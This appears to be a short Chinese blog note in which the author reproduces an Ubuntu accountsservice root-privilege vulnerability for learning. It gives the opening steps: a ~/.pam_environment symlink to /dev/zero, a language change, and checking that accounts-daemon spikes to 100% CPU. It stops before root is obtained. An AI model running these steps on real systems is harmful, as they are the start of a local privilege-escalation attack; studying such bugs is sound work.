最近看到Ubuntu爆出了一个可以获取root权限的漏洞,于是学习复现一下。
accountsservice守护程序(accounts-daemon)是一项系统服务,可以执行诸如创建新用户帐户或更改用户密码的操作。
这里在主目录下创建了一个软连接:
ln -s /dev/zero .pam_environment
然后在设置里面打开区域和语言,随便更改一种语言,之后会出现对话框卡住情况。
回到对话框删除软连接:
rm .pam_environment
查看下系统进程:
top #之后按下c可以进行排序
可以发现有一个accounts-deamon进程CPU达到100%。